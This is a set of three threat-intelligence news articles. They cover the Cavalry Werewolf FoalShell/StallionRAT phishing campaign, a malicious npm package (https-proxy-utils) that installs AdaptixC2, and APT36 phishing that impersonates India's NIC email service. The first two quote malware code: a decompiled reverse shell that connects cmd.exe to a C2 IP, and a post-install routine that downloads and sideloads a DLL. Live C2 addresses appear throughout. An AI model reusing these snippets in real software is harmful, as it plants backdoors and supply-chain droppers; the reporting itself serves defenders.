A sophisticated threat campaign has emerged targeting Russia’s public sector and critical industries between May and August 2025.

The Cavalry Werewolf APT group, also known as YoroTrooper and Silent Lynx, has been actively deploying custom-built malware toolsets through highly targeted phishing operations that exploit trusted governmental relationships.

The campaign focuses on organizations within energy, mining, and manufacturing sectors, leveraging two primary malware families designed for persistent access and command execution.

The threat actors employ spear-phishing emails disguised as official correspondence from legitimate Kyrgyz government entities, including the Ministry of Economy and Commerce and the Ministry of Transport and Communications.

These messages carry RAR archives containing either FoalShell reverse shell or StallionRAT remote access trojan, with filenames carefully crafted to mimic genuine official documents such as “three-month results of joint operations” or “shortlist of employees to receive bonuses.”

The attackers blur the line between impersonation and actual compromise, with evidence suggesting they may have successfully breached real official email accounts to enhance their operational credibility.

Picussecurity analysts identified that the malicious archives are typically downloaded to the %LocalAppData%\Microsoft\Windows\INetCache\Content.Outlook directory, presenting a key detection opportunity for security teams monitoring Outlook cache activity.

The sophistication of this campaign extends beyond social engineering tactics, incorporating multi-language malware implementations that demonstrate the group’s technical versatility and commitment to operational security.

The threat actors have developed variants of their malware in C#, C++, Go, PowerShell, and Python, each designed to evade detection through different mechanisms while maintaining core command-and-control functionality.

Desktop artifacts discovered during analysis indicate the group is preparing to expand beyond Russian targets, with files in Tajik language suggesting interest in Tajikistan and Arabic-named documents pointing toward potential Middle Eastern reconnaissance.

The discovery of AsyncRAT installer files further highlights the group’s evolving toolkit and ambitious operational scope.

FoalShell: Multi-Language Backdoor Architecture

FoalShell represents a lightweight but effective reverse shell implementation designed to grant attackers command-line access through cmd.exe on compromised systems.

The malware’s architecture varies across programming languages, with the C# version establishing straightforward TCP connections to command-and-control servers while maintaining stealth through hidden window styles.

The core functionality operates through a continuous loop that receives commands, executes them via cmd.exe, and returns both standard and error output to the C2 infrastructure located at IP address 188.127.225.191 on port 443.

The C++ variant employs more sophisticated evasion techniques through shellcode loading mechanisms.

An obfuscated FoalShell shellcode is embedded within the executable’s resources under the name “output_bin,” which is extracted and executed in memory allocated with Read, Write, Execute permissions using VirtualAlloc.

The shellcode then deobfuscates the main reverse shellcode before establishing network connectivity to C2 server 109.172.85.63.

*(_DWORD *)&name.sa_data[2] = inet_addr("109.172.85.63");
WSAConnect(s, &name, 16, 0LL, 0LL, 0LL, 0LL);
StartupInfo.dwFlags = 257;
StartupInfo.hStdError = (HANDLE)s;
StartupInfo.hStdOutput = (HANDLE)s;
StartupInfo.hStdInput = (HANDLE)s;
CreateProcessA(0LL, (LPSTR)"cmd.exe", 0LL, 0LL, 1, 0, 0LL, &StartupInfo, &ProcessInformation);

The Go implementation utilizes its own networking stack to connect to C2 server 62.113.114.209 on port 443, forcing cmd.exe processes to run in hidden window states through the HideWindow parameter set to 1.

This multi-language approach allows the attackers to adapt their deployment strategy based on target environment characteristics and security posture, making detection more challenging for traditional signature-based security solutions.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post Cavalry Werewolf APT Hackers Attacking Multiple Industries with FoalShell and StallionRAT appeared first on Cyber Security News.

The emergence of the AdaptixC2 post-exploitation framework in 2025 marked a significant milestone in the evolution of attacker toolsets targeting open-source supply chains.

Positioning itself as a formidable alternative to established tools like Cobalt Strike, AdaptixC2 quickly attracted threat actors seeking agility and stealth in post-exploitation scenarios.

This October, researchers uncovered its delivery through the npm package registry—a supply chain attack targeting developers and organizations reliant on Node.js modules for critical infrastructure and application development.

The incident revolved around a deceptive npm package named https-proxy-utils, which mimicked the functionality and naming conventions of widely used legitimate libraries such as http-proxy-agent.

The threat actors cloned proxy-related features from popular modules, ensuring the malicious package appeared both useful and harmless.

Upon installation, however, the package executed a post-install script designed to download and deploy the AdaptixC2 agent onto the victim’s system, initiating a stealthy foothold for remote access and broader exploitation.

Securelist researchers were the first to identify and analyze the AdaptixC2 npm infection, noting both the technical sophistication of the attack and its alarming implications for open-source threat landscapes.

As the npm ecosystem grows, attackers are increasingly exploiting its trust and wide reach. The discovery highlights the persistent risk posed by supply chain attacks, emphasizing the need for vigilant vetting and continuous monitoring of open-source components.

Infection Mechanism: OS-Specific Adaptation

A standout feature of the AdaptixC2 npm campaign is its tailored infection strategy for multiple operating systems. Once the malicious package executes, it detects the host OS and deploys the payload using methods designed for Windows, macOS, or Linux.

For Windows, the code sideloads the agent as a DLL alongside a legitimate executable, using JavaScript scripting to spawn the compromised process.

Below is a deobfuscated snippet employed for Windows deployment:-

async function onWindows() {
  const url = 'https://cloudcenter.topsysupdate';
  const dllPath = 'C:\\.dll';
  const systemMsdtc = 'C:\\32.exe';
  const tasksMsdtc = 'C:\\.exe';
  try {
    await downloadFile(url, dllPath);
    fs.copyFileSync(systemMsdtc, tasksMsdtc);
    const child = spawn(tasksMsdtc, [], { detached: true, stdio: 'ignore' });
    child.unref();
  } catch (err) {
    console.error(err);
  }
}

This flexible approach extends across macOS and Linux systems, employing autorun configuration and architecture-specific binary delivery to ensure persistent control.

Such OS-targeted infection routines deepen the framework’s ability to evade conventional detection, broadening its scope for exploitation across diverse environments.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post Threat Actors Leverage npm Ecosystem to Deliver AdaptixC2 Post-Exploitation Framework appeared first on Cyber Security News.

A sophisticated phishing campaign orchestrated by Pakistan-linked threat actors has been discovered targeting Indian government entities by impersonating the National Informatics Centre’s email services.

The operation, attributed to APT36, also known as TransparentTribe, leverages social engineering tactics to compromise sensitive government infrastructure through deceptive email communications designed to appear as legitimate NIC eEmail Services correspondence.

The campaign employs carefully crafted phishing lures that mimic official government communication channels, exploiting the trust associated with NIC’s established email infrastructure.

By masquerading as authentic government correspondence, the threat actors aim to trick officials into divulging credentials or downloading malicious payloads.

This targeting strategy demonstrates the group’s deep understanding of Indian government communication protocols and their continued focus on intelligence gathering operations against Indian administrative and defense sectors.

Cyber Team analysts identified the malicious infrastructure supporting this campaign, uncovering a network of fraudulent domains and command-and-control servers designed to facilitate credential harvesting and data exfiltration.

The operation represents a continuation of APT36’s long-standing espionage activities against Indian government targets, reflecting the group’s persistent interest in compromising sensitive governmental communications.

Infrastructure and Technical Indicators

The attack infrastructure reveals a multi-layered command-and-control framework centered around the fraudulent domain accounts.mgovcloud[.]in.departmentofdefence[.]live, which closely mimics legitimate government cloud services.

The primary malicious domain departmentofdefence[.]live serves as the foundation for the phishing operation, while IP address 81.180.93[.]5 operates as a stealth server with C2 functionality accessible on port 8080.

Additional infrastructure includes IP 45.141.59[.]168, providing redundancy and resilience to the adversary’s command-and-control network.

This sophisticated setup enables the threat actors to maintain persistent access while evading detection through a distributed infrastructure that complicates attribution and takedown efforts.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post Pakistani Threat Actors Targeting Indian Govt. With Email Mimic as ‘NIC eEmail Services’ appeared first on Cyber Security News.